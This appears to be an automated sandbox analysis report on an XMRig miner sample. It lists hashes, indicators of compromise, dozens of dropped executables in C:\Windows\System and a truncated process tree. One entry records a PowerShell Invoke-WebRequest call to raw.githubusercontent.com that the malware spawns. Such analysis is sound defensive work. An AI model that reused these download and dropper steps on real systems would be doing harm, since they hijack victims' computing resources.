xmrig | f53559a4ec4903c92be01e340a5f750dfdde55860a3c54c852d48f0454bae311

Analysis

max time kernel
20s
max time network
21s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
29-04-2024 10:19

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
Size

1.8MB
MD5

076ce79112be69777b7427c49d13068c
SHA1

c6548ec90dc1a1defc2141eb0b6ee12a16d309af
SHA256

f53559a4ec4903c92be01e340a5f750dfdde55860a3c54c852d48f0454bae311
SHA512

71f54e40df72e1009874303fb8c3ae6f339eebace2b010a17f0b020ba6441583853b76067c807160264f84770bbd7063ec6e0261da5c0d2f042915892d55c06f
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82SflDrI5V:NABn

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/3316-136-0x00007FF74D470000-0x00007FF74D862000-memory.dmp	xmrig
behavioral2/memory/4496-124-0x00007FF6D8830000-0x00007FF6D8C22000-memory.dmp	xmrig
behavioral2/memory/5012-123-0x00007FF69FC90000-0x00007FF6A0082000-memory.dmp	xmrig
behavioral2/memory/4732-119-0x00007FF676BC0000-0x00007FF676FB2000-memory.dmp	xmrig
behavioral2/memory/4272-115-0x00007FF7FAB50000-0x00007FF7FAF42000-memory.dmp	xmrig
behavioral2/memory/2368-104-0x00007FF63C2A0000-0x00007FF63C692000-memory.dmp	xmrig
behavioral2/memory/1236-100-0x00007FF772A50000-0x00007FF772E42000-memory.dmp	xmrig
behavioral2/memory/2312-99-0x00007FF64A280000-0x00007FF64A672000-memory.dmp	xmrig
behavioral2/memory/3992-91-0x00007FF77E940000-0x00007FF77ED32000-memory.dmp	xmrig
behavioral2/memory/2972-53-0x00007FF7797A0000-0x00007FF779B92000-memory.dmp	xmrig
behavioral2/memory/3512-29-0x00007FF7D6B60000-0x00007FF7D6F52000-memory.dmp	xmrig
behavioral2/memory/1820-23-0x00007FF6A63F0000-0x00007FF6A67E2000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	3108	powershell.exe
5	3108	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1820	IDwSMXG.exe
3512	HLJNNTp.exe
1912	PWMTQis.exe
2972	KZYXohP.exe
3992	HurffOs.exe
2312	ggDDgTH.exe
3660	NcNObGS.exe
4176	SKGssQd.exe
1236	FDiBTqk.exe
2608	XWxIGEe.exe
556	FYFrylG.exe
2368	UuZEAMn.exe
5012	XJMGodZ.exe
3640	QQjiqjG.exe
4496	HVuqUUW.exe
4272	mJRxnuE.exe
4732	jFXerJa.exe
3272	lzRgZId.exe
3316	fuDfDXl.exe
3028	wOQOQKz.exe
4408	MuIJgyb.exe
2068	XUuVAeV.exe
4344	wvzmsCQ.exe
1004	jLrguwX.exe
3500	cQeQRRl.exe
3584	NaDlIzd.exe
4084	qLNpWGf.exe
2968	mHMBIhP.exe
548	FYaNPIC.exe
2664	vuNJlhv.exe
4824	RbXQjkn.exe
4468	fBCPOOO.exe
3124	ssDgohK.exe
1280	pvmUgDj.exe
3472	rtamyKP.exe
4228	eHyLYTj.exe
3732	BbLSJdP.exe
4880	cIWGFdY.exe
4636	QyDCcVg.exe
216	bzCYSwp.exe
4752	vrbSBdH.exe
4384	cIhdKWL.exe
4504	OIHaYux.exe
388	lvBEobX.exe
1432	ZoLCguW.exe
3056	xCUuNEx.exe
4480	RkwLCWR.exe
2108	owmaecc.exe
1344	JdJqaTE.exe
1168	DPxjMch.exe
3060	fSxTKcv.exe
2412	aBTMvhj.exe
4944	plrWtDw.exe
760	gJJyoUI.exe
740	xDZtAEl.exe
4916	CMiUENl.exe
1676	KJxQgRl.exe
64	HxBfKab.exe
756	okApHgL.exe
4320	edyExEQ.exe
4196	tLcsHZl.exe
2492	uLmuWhF.exe
3152	tGLjPGs.exe
3244	fyipIvY.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4044-0-0x00007FF770D40000-0x00007FF771132000-memory.dmp	upx
behavioral2/files/0x0006000000023288-5.dat	upx
behavioral2/files/0x0007000000023421-8.dat	upx
behavioral2/files/0x000a000000023416-9.dat	upx
behavioral2/files/0x0007000000023422-22.dat	upx
behavioral2/files/0x0007000000023423-26.dat	upx
behavioral2/files/0x0007000000023426-47.dat	upx
behavioral2/files/0x0008000000023429-58.dat	upx
behavioral2/files/0x000700000002342e-97.dat	upx
behavioral2/files/0x000700000002342f-111.dat	upx
behavioral2/files/0x0007000000023430-118.dat	upx
behavioral2/files/0x000a000000023418-126.dat	upx
behavioral2/files/0x0007000000023432-133.dat	upx
behavioral2/files/0x0007000000023436-156.dat	upx
behavioral2/files/0x0007000000023439-171.dat	upx
behavioral2/files/0x000700000002343b-181.dat	upx
behavioral2/files/0x000700000002343c-194.dat	upx
behavioral2/files/0x000700000002343e-196.dat	upx
behavioral2/files/0x000700000002343d-191.dat	upx
behavioral2/files/0x000700000002343a-184.dat	upx
behavioral2/files/0x0007000000023438-174.dat	upx
behavioral2/files/0x0007000000023437-169.dat	upx
behavioral2/files/0x0007000000023435-159.dat	upx
behavioral2/files/0x0007000000023434-154.dat	upx
behavioral2/files/0x0007000000023433-149.dat	upx
behavioral2/memory/4408-148-0x00007FF632B70000-0x00007FF632F62000-memory.dmp	upx
behavioral2/memory/3028-142-0x00007FF617160000-0x00007FF617552000-memory.dmp	upx
behavioral2/files/0x0007000000023431-137.dat	upx
behavioral2/memory/3316-136-0x00007FF74D470000-0x00007FF74D862000-memory.dmp	upx
behavioral2/memory/3272-130-0x00007FF7781B0000-0x00007FF7785A2000-memory.dmp	upx
behavioral2/memory/4496-124-0x00007FF6D8830000-0x00007FF6D8C22000-memory.dmp	upx
behavioral2/memory/5012-123-0x00007FF69FC90000-0x00007FF6A0082000-memory.dmp	upx
behavioral2/memory/4732-119-0x00007FF676BC0000-0x00007FF676FB2000-memory.dmp	upx
behavioral2/memory/4272-115-0x00007FF7FAB50000-0x00007FF7FAF42000-memory.dmp	upx
behavioral2/memory/3640-114-0x00007FF649A10000-0x00007FF649E02000-memory.dmp	upx
behavioral2/files/0x000700000002342d-105.dat	upx
behavioral2/memory/2368-104-0x00007FF63C2A0000-0x00007FF63C692000-memory.dmp	upx
behavioral2/files/0x0008000000023428-103.dat	upx
behavioral2/files/0x000700000002342c-101.dat	upx
behavioral2/memory/1236-100-0x00007FF772A50000-0x00007FF772E42000-memory.dmp	upx
behavioral2/memory/2312-99-0x00007FF64A280000-0x00007FF64A672000-memory.dmp	upx
behavioral2/memory/3992-91-0x00007FF77E940000-0x00007FF77ED32000-memory.dmp	upx
behavioral2/files/0x000700000002342b-89.dat	upx
behavioral2/memory/556-82-0x00007FF60B670000-0x00007FF60BA62000-memory.dmp	upx
behavioral2/files/0x000700000002342a-76.dat	upx
behavioral2/files/0x0007000000023427-75.dat	upx
behavioral2/memory/2608-70-0x00007FF768710000-0x00007FF768B02000-memory.dmp	upx
behavioral2/memory/4176-67-0x00007FF7071D0000-0x00007FF7075C2000-memory.dmp	upx
behavioral2/files/0x0007000000023424-69.dat	upx
behavioral2/files/0x0007000000023425-62.dat	upx
behavioral2/memory/3660-60-0x00007FF7EF440000-0x00007FF7EF832000-memory.dmp	upx
behavioral2/memory/2972-53-0x00007FF7797A0000-0x00007FF779B92000-memory.dmp	upx
behavioral2/memory/1912-50-0x00007FF79C950000-0x00007FF79CD42000-memory.dmp	upx
behavioral2/memory/3512-29-0x00007FF7D6B60000-0x00007FF7D6F52000-memory.dmp	upx
behavioral2/memory/1820-23-0x00007FF6A63F0000-0x00007FF6A67E2000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\jQoKRwp.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\MQiffyA.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\bvKeBiv.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\IAjFdxv.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\zhdslSL.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\tgoXwtg.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\quqINGg.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\POhTLCv.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\UhMDdMQ.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\zKtykOM.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\OiWBJwa.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\LlvzTrr.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\HFzDNbG.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\WLQGbEO.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\ynjIerK.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\tJRgSkP.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\InsQZeU.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\ljQbkZp.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\TCTlFpO.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\dbokiim.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\poPfzNg.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\vPHPEmm.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\sXaSoDE.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\vmMyeWO.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\rfHwGRh.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\yfNzbUw.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\nHvkspi.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\lOiblMA.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\MdmZaVh.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\wnIJGEN.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\GGLRFEB.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\yxOgeru.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\FppARLq.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\mAzWBiq.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\GtNaINN.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\qCbVIRw.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\iEBLBgS.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\aqNIVjA.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\mfYxslG.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\BbLSJdP.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\NNbWaxY.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\tJWzoZY.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\cWlXkvU.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\RQKphQG.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\gMuDgyF.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\FTDkvpk.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\GAKeLgE.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\meDfLrD.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\ldIBCHR.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\zxbKqZa.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\RRrCsVa.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\mWqdtbm.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\dJKbTjb.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\ezgexwx.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\LBHeWkS.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\HVuqUUW.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\ZxqnpUc.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\uIklbal.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\xQyyjbo.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\adGQCSU.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\TTYCGWs.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\UCbTvfd.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\GxXrdqN.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
File created	C:\Windows\System\piHWGKM.exe	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeLockMemoryPrivilege	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4044 wrote to memory of 3108	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	83
PID 4044 wrote to memory of 3108	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	83
PID 4044 wrote to memory of 1820	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	84
PID 4044 wrote to memory of 1820	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	84
PID 4044 wrote to memory of 3512	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	85
PID 4044 wrote to memory of 3512	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	85
PID 4044 wrote to memory of 1912	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	86
PID 4044 wrote to memory of 1912	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	86
PID 4044 wrote to memory of 2972	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	87
PID 4044 wrote to memory of 2972	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	87
PID 4044 wrote to memory of 3992	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	88
PID 4044 wrote to memory of 3992	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	88
PID 4044 wrote to memory of 2312	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	89
PID 4044 wrote to memory of 2312	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	89
PID 4044 wrote to memory of 3660	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	90
PID 4044 wrote to memory of 3660	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	90
PID 4044 wrote to memory of 4176	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	91
PID 4044 wrote to memory of 4176	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	91
PID 4044 wrote to memory of 1236	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	92
PID 4044 wrote to memory of 1236	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	92
PID 4044 wrote to memory of 2608	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	93
PID 4044 wrote to memory of 2608	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	93
PID 4044 wrote to memory of 556	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	94
PID 4044 wrote to memory of 556	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	94
PID 4044 wrote to memory of 2368	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	95
PID 4044 wrote to memory of 2368	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	95
PID 4044 wrote to memory of 5012	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	96
PID 4044 wrote to memory of 5012	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	96
PID 4044 wrote to memory of 3640	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	97
PID 4044 wrote to memory of 3640	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	97
PID 4044 wrote to memory of 4496	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	98
PID 4044 wrote to memory of 4496	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	98
PID 4044 wrote to memory of 4272	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	99
PID 4044 wrote to memory of 4272	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	99
PID 4044 wrote to memory of 4732	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	100
PID 4044 wrote to memory of 4732	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	100
PID 4044 wrote to memory of 3272	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	101
PID 4044 wrote to memory of 3272	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	101
PID 4044 wrote to memory of 3316	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	102
PID 4044 wrote to memory of 3316	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	102
PID 4044 wrote to memory of 3028	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	103
PID 4044 wrote to memory of 3028	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	103
PID 4044 wrote to memory of 4408	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	104
PID 4044 wrote to memory of 4408	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	104
PID 4044 wrote to memory of 2068	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	105
PID 4044 wrote to memory of 2068	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	105
PID 4044 wrote to memory of 4344	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	106
PID 4044 wrote to memory of 4344	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	106
PID 4044 wrote to memory of 1004	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	107
PID 4044 wrote to memory of 1004	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	107
PID 4044 wrote to memory of 3500	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	108
PID 4044 wrote to memory of 3500	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	108
PID 4044 wrote to memory of 3584	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	109
PID 4044 wrote to memory of 3584	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	109
PID 4044 wrote to memory of 4084	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	110
PID 4044 wrote to memory of 4084	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	110
PID 4044 wrote to memory of 2968	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	111
PID 4044 wrote to memory of 2968	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	111
PID 4044 wrote to memory of 548	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	112
PID 4044 wrote to memory of 548	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	112
PID 4044 wrote to memory of 2664	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	113
PID 4044 wrote to memory of 2664	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	113
PID 4044 wrote to memory of 4824	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	114
PID 4044 wrote to memory of 4824	4044	076ce79112be69777b7427c49d13068c_JaffaCakes118.exe	114

C:\Users\Admin\AppData\Local\Temp\076ce79112be69777b7427c49d13068c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\076ce79112be69777b7427c49d13068c_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3108
- C:\Windows\System\IDwSMXG.exe
  C:\Windows\System\IDwSMXG.exe
  2⤵
  - Executes dropped EXE
  PID:1820
- C:\Windows\System\HLJNNTp.exe
  C:\Windows\System\HLJNNTp.exe
  2⤵
  - Executes dropped EXE
  PID:3512
- C:\Windows\System\PWMTQis.exe
  C:\Windows\System\PWMTQis.exe
  2⤵
  - Executes dropped EXE
  PID:1912
- C:\Windows\System\KZYXohP.exe
  C:\Windows\System\KZYXohP.exe
  2⤵
  - Executes dropped EXE
  PID:2972
- C:\Windows\System\HurffOs.exe
  C:\Windows\System\HurffOs.exe
  2⤵
  - Executes dropped EXE
  PID:3992
- C:\Windows\System\ggDDgTH.exe
  C:\Windows\System\ggDDgTH.exe
  2⤵
  - Executes dropped EXE
  PID:2312
- C:\Windows\System\NcNObGS.exe
  C:\Windows\System\NcNObGS.exe
  2⤵
  - Executes dropped EXE
  PID:3660
- C:\Windows\System\SKGssQd.exe
  C:\Windows\System\SKGssQd.exe
  2⤵
  - Executes dropped EXE
  PID:4176
- C:\Windows\System\FDiBTqk.exe
  C:\Windows\System\FDiBTqk.exe
  2⤵
  - Executes dropped EXE
  PID:1236
- C:\Windows\System\XWxIGEe.exe
  C:\Windows\System\XWxIGEe.exe
  2⤵
  - Executes dropped EXE
  PID:2608
- C:\Windows\System\FYFrylG.exe
  C:\Windows\System\FYFrylG.exe
  2⤵
  - Executes dropped EXE
  PID:556
- C:\Windows\System\UuZEAMn.exe
  C:\Windows\System\UuZEAMn.exe
  2⤵
  - Executes dropped EXE
  PID:2368
- C:\Windows\System\XJMGodZ.exe
  C:\Windows\System\XJMGodZ.exe
  2⤵
  - Executes dropped EXE
  PID:5012
- C:\Windows\System\QQjiqjG.exe
  C:\Windows\System\QQjiqjG.exe
  2⤵
  - Executes dropped EXE
  PID:3640
- C:\Windows\System\HVuqUUW.exe
  C:\Windows\System\HVuqUUW.exe
  2⤵
  - Executes dropped EXE
  PID:4496
- C:\Windows\System\mJRxnuE.exe
  C:\Windows\System\mJRxnuE.exe
  2⤵
  - Executes dropped EXE
  PID:4272
- C:\Windows\System\jFXerJa.exe
  C:\Windows\System\jFXerJa.exe
  2⤵
  - Executes dropped EXE
  PID:4732
- C:\Windows\System\lzRgZId.exe
  C:\Windows\System\lzRgZId.exe
  2⤵
  - Executes dropped EXE
  PID:3272
- C:\Windows\System\fuDfDXl.exe
  C:\Windows\System\fuDfDXl.exe
  2⤵
  - Executes dropped EXE
  PID:3316
- C:\Windows\System\wOQOQKz.exe
  C:\Windows\System\wOQOQKz.exe
  2⤵
  - Executes dropped EXE
  PID:3028
- C:\Windows\System\MuIJgyb.exe
  C:\Windows\System\MuIJgyb.exe
  2⤵
  - Executes dropped EXE
  PID:4408
- C:\Windows\System\XUuVAeV.exe
  C:\Windows\System\XUuVAeV.exe
  2⤵
  - Executes dropped EXE
  PID:2068
- C:\Windows\System\wvzmsCQ.exe
  C:\Windows\System\wvzmsCQ.exe
  2⤵
  - Executes dropped EXE
  PID:4344
- C:\Windows\System\jLrguwX.exe
  C:\Windows\System\jLrguwX.exe
  2⤵
  - Executes dropped EXE
  PID:1004
- C:\Windows\System\cQeQRRl.exe
  C:\Windows\System\cQeQRRl.exe
  2⤵
  - Executes dropped EXE
  PID:3500
- C:\Windows\System\NaDlIzd.exe
  C:\Windows\System\NaDlIzd.exe
  2⤵
  - Executes dropped EXE
  PID:3584
- C:\Windows\System\qLNpWGf.exe
  C:\Windows\System\qLNpWGf.exe
  2⤵
  - Executes dropped EXE
  PID:4084
- C:\Windows\System\mHMBIhP.exe
  C:\Windows\System\mHMBIhP.exe
  2⤵
  - Executes dropped EXE
  PID:2968
- C:\Windows\System\FYaNPIC.exe
  C:\Windows\System\FYaNPIC.exe
  2⤵
  - Executes dropped EXE
  PID:548
- C:\Windows\System\vuNJlhv.exe
  C:\Windows\System\vuNJlhv.exe
  2⤵
  - Executes dropped EXE
  PID:2664
- C:\Windows\System\RbXQjkn.exe
  C:\Windows\System\RbXQjkn.exe
  2⤵
  - Executes dropped EXE
  PID:4824
- C:\Windows\System\fBCPOOO.exe
  C:\Windows\System\fBCPOOO.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- C:\Windows\System\ssDgohK.exe
  C:\Windows\System\ssDgohK.exe
  2⤵
  - Executes dropped EXE
  PID:3124
- C:\Windows\System\pvmUgDj.exe
  C:\Windows\System\pvmUgDj.exe
  2⤵
  - Executes dropped EXE
  PID:1280
- C:\Windows\System\rtamyKP.exe
  C:\Windows\System\rtamyKP.exe
  2⤵
  - Executes dropped EXE
  PID:3472
- C:\Windows\System\eHyLYTj.exe
  C:\Windows\System\eHyLYTj.exe
  2⤵
  - Executes dropped EXE
  PID:4228
- C:\Windows\System\BbLSJdP.exe
  C:\Windows\System\BbLSJdP.exe
  2⤵
  - Executes dropped EXE
  PID:3732
- C:\Windows\System\cIWGFdY.exe
  C:\Windows\System\cIWGFdY.exe
  2⤵
  - Executes dropped EXE
  PID:4880
- C:\Windows\System\QyDCcVg.exe
  C:\Windows\System\QyDCcVg.exe
  2⤵
  - Executes dropped EXE
  PID:4636
- C:\Windows\System\bzCYSwp.exe
  C:\Windows\System\bzCYSwp.exe
  2⤵
  - Executes dropped EXE
  PID:216
- C:\Windows\System\vrbSBdH.exe
  C:\Windows\System\vrbSBdH.exe
  2⤵
  - Executes dropped EXE
  PID:4752
- C:\Windows\System\cIhdKWL.exe
  C:\Windows\System\cIhdKWL.exe
  2⤵
  - Executes dropped EXE
  PID:4384
- C:\Windows\System\OIHaYux.exe
  C:\Windows\System\OIHaYux.exe
  2⤵
  - Executes dropped EXE
  PID:4504
- C:\Windows\System\lvBEobX.exe
  C:\Windows\System\lvBEobX.exe
  2⤵
  - Executes dropped EXE
  PID:388
- C:\Windows\System\ZoLCguW.exe
  C:\Windows\System\ZoLCguW.exe
  2⤵
  - Executes dropped EXE
  PID:1432
- C:\Windows\System\xCUuNEx.exe
  C:\Windows\System\xCUuNEx.exe
  2⤵
  - Executes dropped EXE
  PID:3056
- C:\Windows\System\RkwLCWR.exe
  C:\Windows\System\RkwLCWR.exe
  2⤵
  - Executes dropped EXE
  PID:4480
- C:\Windows\System\owmaecc.exe
  C:\Windows\System\owmaecc.exe
  2⤵
  - Executes dropped EXE
  PID:2108
- C:\Windows\System\JdJqaTE.exe
  C:\Windows\System\JdJqaTE.exe
  2⤵
  - Executes dropped EXE
  PID:1344
- C:\Windows\System\DPxjMch.exe
  C:\Windows\System\DPxjMch.exe
  2⤵
  - Executes dropped EXE
  PID:1168
- C:\Windows\System\fSxTKcv.exe
  C:\Windows\System\fSxTKcv.exe
  2⤵
  - Executes dropped EXE
  PID:3060
- C:\Windows\System\aBTMvhj.exe
  C:\Windows\System\aBTMvhj.exe
  2⤵
  - Executes dropped EXE
  PID:2412
- C:\Windows\System\plrWtDw.exe
  C:\Windows\System\plrWtDw.exe
  2⤵
  - Executes dropped EXE
  PID:4944
- C:\Windows\System\gJJyoUI.exe
  C:\Windows\System\gJJyoUI.exe
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\System\xDZtAEl.exe
